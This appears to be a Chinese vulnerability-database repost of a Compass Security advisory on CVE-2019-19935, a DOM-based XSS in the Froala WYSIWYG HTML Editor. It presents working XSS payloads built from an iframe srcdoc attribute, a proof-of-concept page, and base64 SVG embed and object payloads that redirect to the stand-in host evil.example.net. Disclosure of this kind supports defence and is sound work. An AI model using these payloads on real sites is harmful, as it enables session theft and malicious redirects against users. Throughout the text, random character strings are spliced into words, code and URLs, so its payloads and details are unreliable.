Froala WYSIWYG HTML Editor 跨站脚本漏洞

漏洞ID 2078842 漏洞类型 跨站脚本
发布时间 2020-07-05 更新时间 2020-07-06
Froala WYSIWYG HTML Editor 跨站脚本漏洞CVE编号 CVE-2019-19935

Froala WYSIWYG HTML Editor 跨站脚本漏洞CNNVD-ID CNNVD-202007-229
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2020070024
http://www.cn? a jnvd.org.cn/web/xxk/ldxqBS V c & j Z 4 YyId.tag?CNNVD=CNNVD-202007-229
|漏洞详情
FrD Q j F X F % Moala WYSIWYGU y s H HTML Editor是美国Froala公司的q ( +一款基于WeK P V k }b的WYSIWYG富文本编辑器。
Froala WYSIWYG HTM? L v P 9 rL Editor 3.0.6版本至3.1.1版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户Y O Z O & ( ;端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
|漏洞EXP~ - = t 4 $ H
#####################_ + T F 0 r 7 V###################( Q . G o#####################
#
# COM^ D F } g cPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#########################e L m K###############4 # ? ( l#####################
#
# Product:  Froala WYSIWYG HTML Editor
# VendoP ! # P w n 8 $rl E S - O:   Froala
# CSNC Iq t ] 4 @ . f 2 SD:  CSNC-2020-004
# CVE ID:   CVE-2019-19935
# Subject:  DOM XSS in Froala WYSIWYG HTML Editor
# Severity: Medium
# Effect:   Remotely exploitable
# Author:   Emanuel Duss <eman@ W | e S {uel.duss@compass-security.com>
# Date:     2020-07-01
#
#########################: B g I a @################################F e m H } Z####
Introduction
----------L I ) m w & H 2--
FI G c 1 $ { m 1 +roala WYSIWYG HTML Editor is a lightweight WYSIWYG HTML Editor written in
JavaScript that enables rich text editing capabilities for web applications
[1]. Froala sanitizes the user iI E 6 I z x k e 1nput in order to prevent cross-site scripting
attacd 4 ! m 1 =ks [2].
During a web applic* F F bation penetration test, Compass found a DO. 1 + n t i ( O /M-l u 1 ;based cross-site
scripting (XSS) [3] i_ R ? w ) *n the Froala WYSIWYG HTML Editor. HTML code in the editor
is not correctly sanitized wr - R ^ ( # [ d Rhen inserted ih s ^ 8nto the DOM. This allows an attacker
that ca, $ * : Qn control the editor content to executP a G D u ; 9 {e arbitr] , ! J Y 9 ~ 7 cary JavW  : M caScript in the
context of theB Y ~ 2 m victim's session.
Affected
--------
* All versions of the Froala WYSIWYG HTML Editor
The issue was found in December 2019 in version 3.0.6 and was still not fixed
in July 2020 in version 3.1.1.
Technical Summary
--u : x = Z r Y i---------------
It's possible to perform DOM based XSS in the Froala editor by inserting the
`<ib : V S = ?frame>` tag and the `srcdoc` attrN 2 0 F * g W yibute into thl 6 h ` C ) _ Ge editor:
<iframe srcdoc="<img src=x onerror=alert(document.domh r 5 v v Hain)>"></iframA d ? ] ge>
This can be verifieC z 2 E _d by inserting the payload into the "Code View" of the
editor.
In this case, this iH b G I A `s would be a self-XSS because the users would only attack
themselves. Howevk 5 M -er, it could be possible that untrusted data froa $ Bm a
non-controlled source is loaded into t% | M * { ) * B ]he editor in o0 ` + trder to expl& . k : 0oit it. An
ey o w W C T qxample could be a J : I | ) web applicatioO 2 ( 2 j Xn where multiple users can edit the same
content usin( O { ^ % (g this editor.
An attacker can use this to execute own JavaScript code in the1 p U 2 g g a J session of the
victim. This can be abused to read the content of the victim's account, use the
session to make further requests to3 i s B l m the web application or read the cX h 2 yookies or
web storage.
Technical Details
-----------------
# Correct Behavior
According to the Froala tech support page "Why is the <script> tag beu X [ ( _ . +ing
removed?", the `<script>` tag is removed in order to prevent possible Xl m s K @ + ,SS
attacks [2 n r2]. Other XSS payloads t( & c Fhat use other HTML tags and eventQ i W P h handlers are
also removed from the DOM before they ared 9 E e 7 f ; E B inserted.
This can be verified using ay | E G F P: ? o Y t g . CoC hosted on `poc.example.net` that inserts
potentially unJ * jtrusted data with a `<script>` tag into the editor:
<v ( w;link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_style.min.css" r4 7 ( eel=w ~ M i"stylesheet" type="text/css" />
<link href="https:/// ? | 8 ~cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_editor.pkgd.min.css" rel="sty) = / Mlesheet" type="text/css" />
<script type="text/javascript~ A e i $  S M" src="https://cdnjsd m r # ? -.cloudflare.com/ajax/libs/fr1 E ^ M a $ w Eoala-editor/3.0.6/js/froala_editor.pkgd.min.js"></script>
<div id="froala-editor">X X | 8 S X;&l& 0 J e F Ct;/div>
<script>
let editQ * -ok P n zr = new FroalaEd$  + Aitor('div#fr! _ = J S _ $oala-editor', {}, function() {
// This data could b4 x j s He loaded from a pote` n q A S bntially untrusted source, e.g. from an Ax F  F Y R wPI via an XMLHttpRequest
data = "&# l x , % T dltE 9 ! v Y ) } a;s>Hello</s><script>console.log(document.domain)</script><u>Compass</u>";
// Inserting untrusted data into the editor
editor.html.set(data);
// Show how thg l 1 I M . s m Xe untrusted data is embedded into the DOM
console.log(editor.html.get());
})
</script>
The JavaScript console shows thw O 4 G 7 p w ( 9at legit HTML tags like `<s>` or `<u>` were2 S 5 -
inserted into? Y a j R # the DOM but the `<script>` tag was correctly removed (as
expected) and therefore the JavaScript was not exm z b Zecuted:
<# / t p><s>Hello</s><u>Compass</u></p>
The same can be dow J $ y anex v ! 3 7 h M R 0 by inserting an `&P 3 rlt;img>J L } & 5;` tag with an `onerror` event
handlx U Ser as an XSS vector:
[...]
data = "<s>Hello</s><img src=x onerror=con9 3 D i e U G g 5sole.log(document.domain)><u>Compass</u>";
[...]
The JavaScript console again shows that the legit HTML tags were inserted and
also the `<img>` t3 + - { j - o 8ag, but without thel P & ; H z used `onerror` event handler. Therefore,
the JavaScript was not executed:
<p><s>Hello</s><img src="https://www.anquankx ` ye.cc h g 8 U ( @om/vul/id/2f 5 ; 4 D078842/x! - 0 Y t ? } U v" class="fr-fic fr-dii"><u>Compass</u></a k - i o Bp>
This shows that it's not possible to load anL ~ { - 5  - ed execute commw $ b N on XSS payloads into_ 9 Y o } p
the editor.
# XSS Bypass
I tried every event handler from the awesome PortSwigger XSS cheat sheet [4],
butW y L 8 B b # ( f all of them were bG 7 @ b % BlockeA L ` 1 v v :d. Thanks to the XSS cheat sheet, I found an HTML
tag with an attribuL v k y c A X ]te that does not start with `on`, whic# f C ^ P f V _ .h can execQ w u V { K Bute
JavaScript in the origin of the website.  This tag was not filtered. It's the
`<iframe>` tag with the `srcdoc` attribute. The `srcdoc` attribute specifies
the HTH G d _ML content of the page to show in the inline frame [5]. Tx 1 t Y ] ) ^ bhis} & D O p # 7 9 U can be used
to embed JavaScript code. The code runs in the origin of the websb o @ ite where the
iframe is embedded.
Working XSS payload:
[...]
data = "<s>Hello</s><iframe srcdoc="<img src=x onerror=console.log(document.domain)>"><D / @ z | -/iframe><u>Compass</u>";
[...]
The JavaScript console shows that the `<i{ n  5 R j - ;frame>` taC 7 ng with the `srcdoc`
attribute was inserted into the DOM without sanitizing.y } ) R Also the content of
the iframe with the `<img>` tag and the `onerror` event handler was not
sanitized. Further, the origin on which PoC website is hosted is printed:
<p><s>Hello</s><iframe srcdoc="<img src=x onerror=alert(document.domaiZ _ o a 6 X ` In)>"></iframe><u>Compass</u></p>
poc.example.net
Therefore, this she # L h :ows that the following XSS payload can beL 4 }  f N + G used in order to
inject and execute JavaScript into the DOM, which results in a DOM-based XSS:
<iframe srcdoc=0 A  n"<img src=x onerror=console.w m -log(docua A +ment.domain)>"></iframe>
Note: The `<img>` tag with the `onerror` event handler is only the data content
of the `srcdoc` attribute and no code for the browser. This is rendered into
code later when the conH u & e 4 Ntent of the iframe is built.
The injected g 3 & P [d JavaScript code runs in the o; C 4 c V ; vrigin of the website wherk ( P + z P A / Oe the Froala
editor is running. The next section explains why I mention this explicitly.
XSS with Undefined / Empty Origin
---------------------------------
There are several issues marked as open and fixed in the Froala9 _ w d GitHub
repository regarding XSS [6]. The closed onesQ v x Y w are also not fD P k ? i qixed at the moment.
However, most of these XSS are running in another or/ P B x Migin as the website where
the editor is loadedv Q Q M K.
# Example 1
For example, the issue #3270 [7] that is marked as closed and uses an embedded
object (`I S % g k ;<embed>` tag) in order to execute JavaScrim - w 7 ! apt:
[...]
data| e F D Y t t ) = "<EMBEDh ! ( ` C :/SRC="data:imagF z a d  x 4e/svgK $ 2 z g Z ,+xml;ba? n R d f &se64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDo. n y n { -vL3d3dy$ d / j53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJ~ B jodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB| ( o L ( {2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5G z I y R b S .sb2coZG9jdW1lbnQuZG9tY2 r N i 1 AWluKTwvc2NyaXB0Pjwvc3ZnPgo=">"
[....]
The base64z R M } d ^ dev 5 Q 8 W d N 4coded payload is an SVG image conta) I 0 + c Kining JavaScript:
<svg xmlns:svgq  2 V ( S="http://www.w3.org/2000/svg" xmlns="http://wwwF d ! ~.w3.org/2000/svg"
xmlnsT R R = | Q ?:xlink="http://www.w3.org/1# b ` l S v T 9999/xlink" version="1.0" x="0" y="0" width="194" height="200"+ w Z z  o ? X id="xss">
<script type="text/ecmascript">console.log. n /(document.domain)</script&C f c  z f c g 1gt;</svg>
The JavaScript console shows that the8 e r code is executed but the origin is
`undefinedN M - V k`:
<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bW9 % t .xuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDoq Q % # JvL3d3dy53My5vcmcvMjAwMC9zdms I W a 6ciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29u2 v W gc29sZS5sb2coZG9jdW1lbnQuZG9+ R B _tYWV @ i 2 f G AluKTwvc2NyaX4 Y q I B v a &B0Pjwvc3ZnPgo="&gY r Q 3 k Nt;</p>
undefined
# Example 2
Another example is the issue #3039 [8] thatp : Z 8 is marked as closed uses the `<object&gf = B ht;`
tR z s J ;ag to embed HTML / JavaScript code:
[...]
data = "<object data='data:text/html,<svg onload=console.log(u I z ) P S m `document.domas D B [ d qin)>'>";
[...]
The JavaScriw 0 apt consolw Y M # l t 6e shows that the code is executed but the origin is empty:
<p><object data="da] k , ^ f F ( 3 xta:text/html,<svg onload=console.log(document.domain)>a 7 I $ t R w;"></obj- q ^ %ect></p>
// empty line
# Exploiting XSS with Undefined / Empty Origins
Because the origin is not the same` b Z E  i l F F as w9 c ` 6 i G K Ohere the PoC is hosted, it's not a
typical XSS where an attacker could read the content of the victim's website,
use the session to make further requests or access thZ M 2e cookies or web st1 ? [ p s } n cora) ^ N E L ` . ( wge.
IV ) N dt is ho( 9 E 5 E u . ewever still possible to perform arbitrary redirects to other weL ? # D , C -bsites
using the reference to the `window.top.location`:
[...]
data = "<object data='q g }datag L H y:text/html,<svg onload=window.top.location="http://evil.example.net/">'>";
[...]
This redirects to http5 ` ! D *  ?://evil.example.net/.
The same applies for the embed tag:
[...]
data = "<EMBED/SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzds P X T q Lmc9Imh0dH Z .A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjA/ # @ - Y ZwMC9zd* | H K 4 I U -mciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rI. i 7  m fiB2ZXJzaW9uP# m 5 H  b o ISIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIz ( ExOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj4KICA8c2NyaXB0PndpbmRvdy50b3AubG9jYXRpb249Imh0dHA6Ly9ldmlsLmV4YW1wbGUubmV0LyI8L3NjcmlwdD4KPC9zdmc+Cg==">"
[...]
DecodeT Z 8 - X Od base64 payload:
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="00 I U % E X 1 m" width="194" height="2? N / w x D E Q ,00" id="xss"- i . t ; u ! | U>
<script>window.top.location="http://evil.example.net/"</script>
</svg>
T: ^ * 9 X r .his also redirects to http://evil.example.net/.
This isP v b not as nice andM S @ p} U 5 Aowerr b C U f % _ Mful as the "real" XSS attack from the beginning, but still
something ;-).
Vulnerability Classification
----------------------------
C# @ X + .VSS v3.1 Metrics [9]:
* CVSS Base Score: 6.1
* CVSSo F  T H q 2 Vector:     AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Remediation
---------W ] 4 } [  )  t--
T6 @ % 8 } K + ohis XSS issue is not fixed. The vendor) Z T U ? E  5 } can't tell anyp H * Q w Z exact release dI  3 _ P - J 7 ?ate for a
fixed version.
TE U 2 g F Qherefore, only tr i ] # a Brusted data or data that is already sanitized should be loaded
into the editor.
Timeline
--------
2019-12-05    Discovered vulnerabj S Z ` Xility and informed customer.
2019-12-06    Contacted Froala and asked for security contact. A# , R ( = t ,uto reply receY K n Xived, ticket #15328 opened.
2019-12-09    Asked again, got response. Contact via e-mO B ` ; ( ! 7ail (support@froala.com) and ticket number.
2019-12-10    Sent vulnerability details.
2019-1; z U s2-16    Froala confirmed vulnerability and that all Froala HTML editor versions are affected.
2019-12-19    Ina s 3 p # zformeD 3 ` v I 9 Dd Froala about the closed XS} T ` J 8 X S _S GitHub issues that are still not fixed.
2019-12-23    MITy v CRE a] 6 n M ; n Pssigned CVE number CVE-2019-19935.
2019-12-26    Froala tells that this issue has high priority. Issue wils 5 D ~ { Vl be fixed after version 3.1.0.
2020-01-09    Asked F1 9 : ] X _ H _ groala for up[ y j Cdates on the isC & 0sue.
2020-01-10    Froala tells thaY 6 } _ ] b a &t all reported issues will beM = h u $ 0 x X N fixed after version 3.1.1.
2020-02-21    AsJ 8 uked Froala for updat_ c f ] a tes on the issue. No rep { T : 5 1 D w esponse.
2020-03-09    Asked Froala for updates oY N / b  Jn the issuec x ? $ b.
2020-03-20    Froala tells that issue will be fixed in the next release.
2020-04-21    Asked Froala] N ? D M O w v for updates on the issue.
Froala denied that there is any XSS issue, even if they confirmeds _ ! : D O k the issueb ^ u B d J 3 before.
Delivered a PoC and additional details that demonstrates an: e R J I {d explains theh { # K G iss6 a $ _ K 3 d vue in detail.
Froala understands tb & k q Y -he issue and tells that itc G X Z r { J will be fixed in the next release
(no exact relea 6 { c /se date known but it shouZ j _ld be fixed in Q2 of 2020)
2020-05-01    Asked Froala for updates on the issue. Still nP B D ? 4 u S to release date known.
2020-06-02    Asked Froala for updates on the issue. Stij j ? F f f = C !ll no release date known.
2020-06-23    Asked Fror T o v e F 9 Iala for updates o1 5 j 7 7 ` V Kn the issue. Should be rM V R 2 R 2 leleased in July.
2020-07-01    Public disclosure after Q2 has ended anY u f M Q d wd more than 200 days after initial notifiR E _ S 2cation.
References
----------
[1] https://froala.com/wysiwyg-editor/
[2] https://wysiwyg-editor.froala.help/hc/en-us/articles/115000428829-Why-is-the-script-tag-being-re6 h m - J & s j =moved-
[3] https://portswigger.net/web-security/cross-site-scripting/dom-based
[= I a V 8 p m4] https:D } X//portswigger.nl x t 1 Z qet/w) { ueb-security/cross-site-scripting/cheat-sheet
[5] https://www.w3schoi z % |ols.com/tags/att_iframe_srcdoc.asp
[6] https://github.ch 5 ? Mom/froala/wysiwyg-editor/issues?q=is%3Aissue+xss
[7] https://github.com/froala/wysiwyg-editor* ~ i 4 r T E/issues/3270
[8] https://github.com/froala/wysiwyg-editor8 x L - T . #/issues/3039
[9] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A: H 5 / g gN&versionV F ; a  M=3.1
|参考资料

来源:packetstormsecurity.com

链接:https://pac? Z R | Z Fketstormsecurity.com/files/158300/Froala-WYSIWYG-HTML-Editor-3.1.1-Cross-Site-Scripting.html